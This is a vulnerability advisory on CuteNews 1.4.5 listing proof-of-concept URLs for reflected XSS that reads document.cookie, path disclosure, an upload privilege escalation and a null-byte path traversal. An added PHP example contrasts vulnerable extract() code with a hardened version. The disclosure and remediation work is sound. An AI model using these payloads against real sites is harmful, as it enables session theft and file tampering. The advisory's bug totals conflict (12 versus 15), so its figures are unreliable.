Product: cutenews 1.4.5
Vendor: http://cutephp.com
Results of a security analysis of CuteNews 1.4.5
[provided by KAPDA.ir]
--------------------------------------------------
Test plan:
Manual penetration testing: YES
Using automated tools: NO
Code Auditing: YES
Statistical results from a 'security audit' perspective
TOTAL UNIQUE BUGS (12)
Number of integration errors: 3
Type: Path disclosure, authorization error (privilege escalation), XSS
PoC:index.php?debug
DREAD Severity: 7 (Low)
PoC:index.php?mod=images&subaction=upload
DREAD Severity: 12 (Medium)
PoC:rss.php?rss_news_include_url=aAa&rss_title=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
Number of technical errors: 9
Type: XSS, HTML injection, path disclosure, path traversal
PoC:show_news.php?KAPDA="><script>alert()</script>
DREAD Severity: 7 (Low)
PoC:index.php?mod=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:search.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
DREAD Severity: 8 (Medium)
PoC:index.php?mod=images&action=preview&image=>"</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:mod=images&action=quick&area='</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&source="><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:Story field: </textarea><script>alert(document.cookie)</script>
DREAD Severity: 12 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&selected_news=)
DREAD Severity: 7 (Low)
PoC:index.php?mod=massactions&action=do_mass_delete&selected_news=1&source=../upimages/ddddd.php%00
DREAD Severity: 10 (Medium)
Number of Logical errors: 0
Statistical results from a 'functional risk base' perspective
Authentication mechanism: passed
Use a policy of least-privileged accounts: passed
Session Management: passed
Cookie Management: passed
Sensitive Data Management: passed
Cryptography: passed
Error handling: Passed, but with negligence
Authorization: Passed, but with negligence
Configuration management: Passed, but with negligence
PHP coding performance: Passed, but with negligence
Security by design: Passed, but with negligence
Note: improper use of extract() on request data (every GET/POST parameter becomes a local variable that is later echoed into the page without validation) is the root cause of several of the cross-site scripting bugs listed above.
Input/Data validation: Not passed
Auditing and Logging: Not Passed
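The PHP below is an example added by the editor, not CuteNews code. The function names (render_vulnerable, render_hardened, safe_upload_path), the module whitelist and the sample inputs are illustrative assumptions. It shows how extract() over request data produces the reflected XSS in the mod= PoC above, one hardened rewrite of the same logic, and a file-name check aimed at the ../upimages/...%00 path-traversal PoC.

```php
<?php
// Added example (not CuteNews code). Names and inputs are assumptions.

// --- Vulnerable pattern: extract() on the request array ---------------------
function render_vulnerable(array $request): string
{
    // Every request key becomes a local variable, so ?mod=<script>... yields
    // $mod = '<script>...' with no validation, and a client can also clobber
    // variables the script never intended to take from the request.
    extract($request);
    // $mod is echoed straight into HTML: reflected XSS.
    return "<h1>Module: $mod</h1>";
}

// --- Hardened pattern: explicit parameters, whitelist, output encoding -------
function render_hardened(array $request): string
{
    // Illustrative whitelist of module names (assumption, not CuteNews' list).
    $allowed_mods = ['main', 'images', 'massactions', 'options'];
    $mod = isset($request['mod']) ? (string) $request['mod'] : 'main';
    if (!in_array($mod, $allowed_mods, true)) {
        $mod = 'main';   // unknown value: fall back instead of reflecting it
    }
    // Anything that does reach the page is entity-encoded for the HTML context.
    return '<h1>Module: ' . htmlspecialchars($mod, ENT_QUOTES, 'UTF-8') . '</h1>';
}

// --- File-name check for the source=../upimages/x.php%00 class of bug --------
function safe_upload_path(string $base_dir, string $name): ?string
{
    // Reject an embedded NUL first: "x.php%00" URL-decodes to "x.php\0", and
    // PHP before 5.3.4 truncated file paths at the NUL, cutting off any
    // extension the application appended afterwards.
    if (strpos($name, "\0") !== false) {
        return null;
    }
    // Drop every directory component (defeats ../ sequences), then require a
    // conservative character set with no leading dot, so "..", "" and
    // ".htaccess" are all rejected.
    $name = basename($name);
    if (!preg_match('/^[A-Za-z0-9_-][A-Za-z0-9_.-]{0,63}$/', $name)) {
        return null;
    }
    return rtrim($base_dir, '/') . '/' . $name;
}

// Constructed inputs mirroring the PoCs in the advisory.
$attack = ['mod' => '<script>alert(document.cookie)</script>'];
echo render_vulnerable($attack), "\n";   // script tag reflected verbatim
echo render_hardened($attack), "\n";     // falls back to 'main'; nothing reflected

var_dump(safe_upload_path('/var/www/upimages', "../upimages/ddddd.php\0")); // NULL
var_dump(safe_upload_path('/var/www/upimages', '../../etc/passwd'));        // NULL
var_dump(safe_upload_path('/var/www/upimages', 'photo.jpg'));               // "/var/www/upimages/photo.jpg"
```

The point of the hardened version is that request data is read by name, validated against a closed set, and encoded at the output boundary; replacing extract() with explicit assignments alone would still leave the reflection if the value were echoed unencoded.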
Statistical results from a 'security metrics' perspective
Number of discovered bugs: 15
Number of reviewed Code Lines: 6000
Bugs per 10KLOC: 25
Vulnerabilities severity average: Low
Number of discovered bugs after stable release: 15
Number of 'Documents' pages relevant to security: 1
Quality of Security support: Moderate
Security grade at the current version (1.4.5) from KAPDA: B-
Note: all grades are: A, B+, B, B-, C+, C, C-, D
Reference: http://www.kapda.ir/advisory-450.html